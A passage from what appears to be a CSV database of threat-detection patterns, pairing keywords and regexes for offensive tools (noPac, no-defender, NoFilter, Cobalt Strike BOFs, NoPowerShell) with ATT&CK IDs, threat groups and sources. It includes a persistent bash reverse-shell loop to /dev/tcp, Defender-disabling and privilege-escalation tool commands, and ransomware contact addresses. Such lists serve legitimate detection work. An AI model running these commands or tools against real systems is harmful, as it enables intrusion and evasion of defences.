"*noconsolation --local *cmd.exe*",".{0,1000}noconsolation\s\-\-local\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53496"
"*noconsolation --local *powershell.exe*",".{0,1000}noconsolation\s\-\-local\s.{0,1000}powershell\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53497"
"*No-Consolation.cna*",".{0,1000}No\-Consolation\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53498"
"*NoConsolation.x64.o*",".{0,1000}NoConsolation\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53499"
"*NoConsolation.x86.o*",".{0,1000}NoConsolation\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53500"
"*No-Consolation-main*",".{0,1000}No\-Consolation\-main.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53501"
"*node dnskire.js*",".{0,1000}node\sdnskire\.js.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","53502"
"*node stealer.js *",".{0,1000}node\sstealer\.js\s.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","53503"
"*no-defender/dllmain.cpp*",".{0,1000}no\-defender\/dllmain\.cpp.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","53505"
"*no-defender\dllmain.cpp*",".{0,1000}no\-defender\\dllmain\.cpp.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","53506"
"*no-defender-loader --*",".{0,1000}no\-defender\-loader\s\-\-.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","53507"
"*no-defender-loader.exe --*",".{0,1000}no\-defender\-loader\.exe\s\-\-.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","53508"
"*noescapemsqxvizdxyl7f7rmg5cdjwp33pg2wpmiaaibilb4btwzttad.onion*",".{0,1000}noescapemsqxvizdxyl7f7rmg5cdjwp33pg2wpmiaaibilb4btwzttad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53509"
"*noescaperjh3gg6oy7rck57fiefyuzmj7kmvojxgvlmwd5pdzizrb7ad.onion*",".{0,1000}noescaperjh3gg6oy7rck57fiefyuzmj7kmvojxgvlmwd5pdzizrb7ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53510"
"*NoFault\NoFault.*",".{0,1000}NoFault\\NoFault\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","53511"
"*NoFilter.exe *",".{0,1000}NoFilter\.exe\s.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","53512"
"*NoFilter-main.zip*",".{0,1000}NoFilter\-main\.zip.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","53513"
"*nohup ./nps &*",".{0,1000}nohup\s\.\/nps\s\&.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#linux","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","53514"
"*nohup bash -c ""while :; do bash -i >& /dev/tcp/*/* 0>&1; sleep 10; done*",".{0,1000}nohup\sbash\s\-c\s\""while\s\:\;\sdo\sbash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\;\ssleep\s10\;\sdone.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","53515"
"*noname2j6zkgnt7ftxsjju5tfd3s45s4i3egq5bqtl72kgum4ldc6qyd.onion*",".{0,1000}noname2j6zkgnt7ftxsjju5tfd3s45s4i3egq5bqtl72kgum4ldc6qyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53516"
"*nonamef5njcxkghbjequlibwe5d3t3li5tmyqdyarnrsryopvku76wqd.onion*",".{0,1000}nonamef5njcxkghbjequlibwe5d3t3li5tmyqdyarnrsryopvku76wqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53517"
"*nonamehack2023@gmail.com*",".{0,1000}nonamehack2023\@gmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53518"
"*nonamehack2023@tutanota.com*",".{0,1000}nonamehack2023\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","53519"
"*NoodLinux v1.0.1*",".{0,1000}NoodLinux\sv1\.0\.1.{0,1000}","offensive_tool_keyword","NoodleRAT","AV signature of noodlerat malware","T1059.004 - T1078 - T1105 - T1100 - T1547.006","TA0003 - TA0005 - TA0010 - TA0011","N/A","N/A","Malware","https://www.trendmicro.com/en_us/research/24/f/noodle-rat-reviewing-the-new-backdoor-used-by-chinese-speaking-g.html","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","53520"
"*nop_shellcode.bin*",".{0,1000}nop_shellcode\.bin.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53521"
"*noPac * -dc-ip * --impersonate *",".{0,1000}noPac\s.{0,1000}\s\-dc\-ip\s.{0,1000}\s\-\-impersonate\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","53522"
"*noPac.* -create-child*",".{0,1000}noPac\..{0,1000}\s\-create\-child.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53523"
"*noPac.* -dc-host *",".{0,1000}noPac\..{0,1000}\s\-dc\-host\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53524"
"*noPac.* -dc-ip *",".{0,1000}noPac\..{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53525"
"*noPac.* -domain-netbios*",".{0,1000}noPac\..{0,1000}\s\-domain\-netbios.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53526"
"*noPac.* -dump*",".{0,1000}noPac\..{0,1000}\s\-dump.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53527"
"*noPac.* -hashes *",".{0,1000}noPac\..{0,1000}\s\-hashes\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53528"
"*noPac.* --impersonate *",".{0,1000}noPac\..{0,1000}\s\-\-impersonate\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53529"
"*noPac.* -just-dc-ntlm*",".{0,1000}noPac\..{0,1000}\s\-just\-dc\-ntlm.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53530"
"*noPac.* -just-dc-user *",".{0,1000}noPac\..{0,1000}\s\-just\-dc\-user\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53531"
"*noPac.* -new-name *",".{0,1000}noPac\..{0,1000}\s\-new\-name\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53532"
"*noPac.* -no-add *",".{0,1000}noPac\..{0,1000}\s\-no\-add\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53533"
"*noPac.* -pwd-last-set*",".{0,1000}noPac\..{0,1000}\s\-pwd\-last\-set.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53534"
"*noPac.* -service-name *",".{0,1000}noPac\..{0,1000}\s\-service\-name\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53535"
"*noPac.* -shell*",".{0,1000}noPac\..{0,1000}\s\-shell.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53536"
"*noPac.* -shell-type *",".{0,1000}noPac\..{0,1000}\s\-shell\-type\s.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53537"
"*noPac.* -use-ldap*",".{0,1000}noPac\..{0,1000}\s\-use\-ldap.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53538"
"*noPac.csproj*",".{0,1000}noPac\.csproj.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","0","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","53539"
"*noPac.csproj.AssemblyReference.cache*",".{0,1000}noPac\.csproj\.AssemblyReference\.cache.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","0","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","53540"
"*noPac.py*",".{0,1000}noPac\.py.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","53541"
"*noPac.sln*",".{0,1000}noPac\.sln.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","0","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","53542"
"*nopcorn/DuckDuckC2*",".{0,1000}nopcorn\/DuckDuckC2.{0,1000}","offensive_tool_keyword","DuckDuckC2","A proof-of-concept C2 channel through DuckDuckGo's image proxy service","T1071.001 - T1090.003","TA0011 - TA0042","N/A","N/A","C2","https://github.com/nopcorn/DuckDuckC2","1","1","N/A","N/A","10","10","74","6","2023-11-12T10:24:59Z","2023-09-23T20:00:09Z","53544"
"*NoPowerShell.cna*",".{0,1000}NoPowerShell\.cna.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53545"
"*NoPowerShell.cna*",".{0,1000}NoPowerShell\.cna.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53546"
"*NoPowerShell.Commands*",".{0,1000}NoPowerShell\.Commands.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","53547"
